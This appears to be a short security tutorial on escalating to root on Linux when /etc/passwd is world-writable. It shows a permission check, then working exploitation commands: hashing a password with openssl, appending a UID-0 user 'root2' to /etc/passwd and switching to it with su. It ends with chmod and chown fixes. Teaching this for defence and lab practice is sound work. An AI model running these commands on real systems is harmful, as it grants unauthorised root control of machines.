Exploiting Writable /etc/passwd for Root Access
Understanding how writable /etc/passwd can lead to privilege escalation
Exploiting Writable /etc/passwd for Root Access
Writable /etc/passwd = Instant Privilege Escalation
One of the most classic and dangerous Linux misconfigurations is having a writable /etc/passwd file.
If a low-privileged user is able to write to this file, it can directly lead to root access.
Checking if /etc/passwd is Writable
To verify the permissions of the file, use:
1
ls -la /etc/passwd
Example Output:
1
-rw-rw-rw- 1 root root 1342 Jan 10 12:00 /etc/passwd
Explanation:
1
2
3
4
-rw-rw-rw-
Owner (root) → read & write
Group → read & write
Others → read & write
👉 The last rw- means any user on the system can modify the file, which is a critical vulnerability.
Exploitation
1
2
3
4
5
6
7
openssl passwd Passw0rd
<HASH>
echo "root2:<HASH>:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2
Password: Passw0rd
Mitigation
- Ensure correct permissions:
1
chmod 644 /etc/passwd - Ensure proper ownership:
1
chown root:root /etc/passwdTip: Always check sensitive files like
/etc/passwdduring privilege escalation — a single misconfiguration can lead to full system compromise.
This post is licensed under
CC BY 4.0
by the author.